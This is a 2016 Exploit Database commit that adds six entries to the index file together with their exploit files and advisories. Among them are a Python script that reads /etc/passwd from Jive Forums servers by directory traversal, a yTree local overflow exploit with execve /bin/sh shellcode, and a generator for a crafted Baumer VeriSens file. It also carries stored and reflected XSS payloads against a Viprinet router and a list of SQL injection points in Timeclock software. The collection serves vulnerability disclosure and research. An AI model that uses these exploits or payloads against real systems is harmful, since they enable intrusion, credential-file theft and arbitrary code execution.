DB: 2016-02-04

6 new exploits
This commit is contained in:
Offensive Security 2016-02-04 05:01:40 +00:00
parent 970933a341
commit 1221dcb78e
7 changed files with 364 additions and 0 deletions

View file

@ -35413,6 +35413,7 @@ id,file,description,date,author,platform,type,port
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
@ -35641,3 +35642,8 @@ id,file,description,date,author,platform,type,port
39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0
39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0
39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,50 @@
Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300
CVE: CVE-2014-2045
Vendor: Viprinet
Product: Multichannel VPN Router 300
Affected version: 2013070830/2013080900
Fixed version: 2014013131/2014020702
Reported by: Tim Brown
Details:
The data supplied to both the `old and `new web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.
Stored cross-site scripting could be triggered by:
Attempting to login with a username of `<script>alert(1)</script> (affects `old interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log)
Creating an account with a username of `<script>alert(1)</script> (affects both `old and `new interfaces once created)
Setting the devices hostname to `<script>alert(1)</script> (affects `old interface once created)
A number of locations were identified as being vulnerable to reflective attacks, including:
http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56
The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files.
These are simply some examples of how this attack might be performed, and the it is believed that both the `old and `new web applications are systemically vulnerable to this.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

61
platforms/jsp/webapps/39405.py Executable file
View file

@ -0,0 +1,61 @@
'''
JiveForums <=5.5.25 Directory Traversal Vulnerability
Description
==========
Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc.
The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected.
Details
=======
Product: JiveSoftware
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: https://www.jivesoftware.com
Credits
============
Discovered by: Zhaohuan of Tencent Security
Site: http://security.tencent.com
Affected Products:
=================
Test on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
maybe work <= 5.5.25
Exploit:
============
'''
#!/usr/bin/python
# Author: Zhaohuan || http://weibo.com/hackyou
# Google Dork: inurl:servlet/JiveServlet
# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
#
# Software Link: https://www.jivesoftware.com
import urllib2
import sys
print "JiveForums <=5.5.25 Directory Traversal Exploit"
if len(sys.argv) != 3:
print "[-] Trying exploit on : <site> <path>"
print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0]
sys.exit()
payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload
response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload)
readvul=response.read()
print readvul
'''
Solution:
============
Update to jiveforums 5.5.30 or the latest version.
More Information:
https://www.jivesoftware.com/services-support/
'''

72
platforms/linux/dos/39406.py Executable file
View file

@ -0,0 +1,72 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com
# Program affected: yTree - File manager for terminals v1.94-1.1
# Description: yTree is prone to a stack-based overflow, an attacker could exploit
# this issue to execute arbitrary code in the context of the application.
# Failed exploit attempts will result in a denial-of-service condition.
#
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program Description: This is a file manager that separates files from directories
# and allows you to select and manage files from different directories.
# It works on black and white or color terminals and is UTF-8 locales aware.
# Vendor homepage: http://www.han.de/~werner/ytree.html
# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb
# MD5sum: 7d55d9c7e8afb4405c149463613f596b
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c
# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7f888c1 <werase+49>: mov eax,DWORD PTR [eax+0x4c]
# 0xb7f888c4 <werase+52>: mov DWORD PTR [esp+0x24],eax
# 0xb7f888c8 <werase+56>: mov eax,DWORD PTR [edi+0x50]
# 0xb7f888cb <werase+59>: mov DWORD PTR [esp+0x28],eax
# 0xb7f888cf <werase+63>: mov eax,DWORD PTR [edi+0x54]
# 0xb7f888d2 <werase+66>: mov DWORD PTR [esp+0x2c],eax
# 0xb7f888d6 <werase+70>: mov eax,DWORD PTR [edi+0x58]
# 0xb7f888d9 <werase+73>: mov DWORD PTR [esp+0x30],eax
# --------------------------------------------------------------------------------
# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# gdb$ backtrace
# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# 1 0x08050f43 in ?? ()
# 2 0x08051182 in ?? ()
# 3 0x0805972f in ?? ()
# 4 0x0804a68a in ?? ()
# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287
# 6 0x0804a701 in ?? ()
import os,subprocess
def run():
try:
print "# yTree Buffer Overflow by Juan Sacco"
print "# It's fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*65
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*1200
eip = "\xd0\xf6\xff\xbf"
subprocess.call(["ytree",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, yTree not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

37
platforms/php/webapps/39404.txt Executable file
View file

@ -0,0 +1,37 @@
#############################
Exploit Title : Timeclock-software - Multiple SQL injections
Author:Marcela Benetrix
Date: 01/27/2016
version: 0.995 (older version may be vulnerable too)
software link:http://timeclock-software.net
#############################
Timeclock software
Timeclock-software.net's free software product will be a simple solution to
allow your employees to record their time in one central location for easy
access.
##########################
SQL Injection Location
1. http://server/login.php
username and password were vulnerable to time-based blind sql injection
type.
Moreover, once logged into the app; the following URLs were found to be
vulnerable too:
2. http://server/view_data.php?period_id
3. http://server/edit_type.php?type_id=
4. http://server/edit_user.php?user_id=
5. http://server/edit_entry.php?time_id=
All of them are vulnerable to Union query and time-based blind.
##########################
Vendor Notification
01/27/2016 to: the developers. They replied immediately and fixed the
problem in a new release
002/03/2016: Disclosure

48
platforms/windows/dos/39158.txt Executable file
View file

@ -0,0 +1,48 @@
Dear List,
Greetings from vishnu (@dH4wk)
1. Vulnerable Product
- Advanced Encryption Package
- Company http://www.aeppro.com/
2. Vulnerability Information
(A) Buffer OverFlow
Impact: Attacker gains administrative access
Remotely Exploitable: No
Locally Exploitable: Yes
3. Vulnerability Description
A 1006 byte causes the overflow. It is due to the inefficient/improper
handling of exception. This is an SEH based stack overflow and is
exploitable..
4. Reproduction:
It can be reproduced by pasting 1006 "A"s or any characters in the
field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
tab..
*Windbg Output*
==============================================================
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for
image00000000`00400000
image00000000_00400000+0x19c0:
004019c0 f00fc108 lock xadd dword ptr [eax],ecx
ds:002b:4141413d=????????
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??
==============================================================
Regards,
Vishnu Raju.

90
platforms/windows/dos/39403.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python
#
#
# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability
#
#
# Vendor: Baumer Holding AG | Baumer Optronic GmbH
# Product web page: http://www.baumer.com
# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/
# Affected version: 2.6.2 (ID-CS-XF-XC)
#
# Summary: The Baumer Application Suite is the intuitive configuration
# software for VeriSens vision sensors, which makes it quick and simple
# for even new users to implement image processing tasks. Starting with
# the creation of test tasks through to the management of jobs, the program
# will take you through just a few steps to reach your goal.
#
# Desc: The vulnerability is caused due to a boundary error in baselibs.dll
# library when processing device job file, which can be exploited to cause
# a buffer overflow when a user opens e.g. a specially crafted .APP file.
# Successful exploitation could allow execution of arbitrary code on the
# affected machine.
#
# -------------------------------------------------------------------------
# (78c.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll -
# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010
# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00 mov eax,dword ptr [eax] ds:002b:4d81ab45=????????
# 0:000> u
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00 mov eax,dword ptr [eax]
# 56bc4188 8bc8 mov ecx,eax
# 56bc418a 8bd0 mov edx,eax
# 56bc418c c1ea18 shr edx,18h
# 56bc418f c1f908 sar ecx,8
# 56bc4192 81e100ff0000 and ecx,0FF00h
# 56bc4198 0bca or ecx,edx
# 56bc419a 8bd0 mov edx,eax
# 0:000> dds
# 56bc6b86 00107d80
# 56bc6b8a 8b117457
# 56bc6b8e f0e181cb
# 56bc6b92 e8000000
# 56bc6b96 fffff9e6
# 56bc6b9a 02ebf88b
# 56bc6b9e ff85fa8b
# 56bc6ba6 68000001
# 56bc6baa 56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154
# 56bc6bae 3f8ce857
# 56bc6bb2 c483ffff
# 56bc6bb6 75c0850c USER32!SetKeyboardState+0x705a
# 56bc6bba 325b5f07
# -------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5303
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php
#
#
# 14.11.2015
#
header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
"\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
" \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
"\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F
buffer = "\x41" * 6719 + "\x42\x42\x42\x42"
f = open ("exploit.app", "w")
f.write(header + buffer +'\x0F')
f.close()
print "File exploit.app created!\n"
#
# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip
#